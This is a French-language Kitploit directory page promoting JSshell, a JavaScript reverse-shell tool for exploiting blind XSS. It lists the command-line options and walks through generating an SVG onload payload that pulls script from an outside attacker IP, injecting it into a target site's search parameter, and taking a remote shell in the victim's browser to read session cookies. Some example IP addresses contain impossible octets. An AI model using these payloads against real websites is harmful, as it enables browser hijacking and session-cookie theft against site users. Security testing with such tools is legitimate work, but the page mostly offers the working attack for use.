Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
JSshell — JSshell - Shell JavaScript inversé/distant | Kitploit
Outils/GitHubGitHub/shelld3v/jsshell
Génération de PayloadsExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubshelld3v/jsshell

JSshell

JSshell - Shell JavaScript inversé/distant

Voir le dépôt
631110il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

JSshell - version 3.1

JSshell

JSshell - un shell inverse JavaScript. Il est utilisé pour exécuter du code JS à distance, exploiter les XSS aveugles, ...

Prérequis : Tout OS + Python 2 ou Python 3

Nouveautés de JSshell version 3.1

Mise à jour dans la nouvelle version de JShell 3.1 :

  • Nouvelle commande JSshell : snippet -> permet d'écrire un snippet de code javascript
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Mode silencieux (pour professionnels)
  • Ajout d'une payload de shell inverse <body>
  • Correction de quelques bugs

Utilisation

Générer des payloads de shell inverse JS : -g

Définir le numéro de port local pour l'écoute et la génération des payloads (par défaut : 4848) : -p

Définir l'adresse source locale pour la génération des payloads (par défaut : détection automatique de votre adresse IP) : -s

Définir le délai d'attente pour la connexion du shell (si l'utilisateur quitte la session, le shell sera suspendu indéfiniment, donc si vous définissez un délai, le shell se fermera après avoir dépassé ce délai) : -w

Exécuter une commande après avoir obtenu le shell : -c

Exemples d'utilisation :

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

Un exemple d'exécution de JSshell :

Ceci est un exemple pas à pas de l'utilisation de JSshell.

Tout d'abord, nous devons générer une payload de shell inverse JS et définir le délai d'attente du shell (par exemple 20 secondes) :

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Maintenant, collez cette payload sur le site web :

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

Accédez à la page et nous obtiendrons le shell inverse JS :

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Exécutons quelques commandes :

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

Et une alerte apparaîtra : controlled

root@kitploit:~
$ prompt(document.cookie)
$

Et le navigateur affichera les cookies de l'utilisateur : JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

Maintenant, terminé !

Auteur

Ceci est créé par shelld3v !

Télécharger l’outil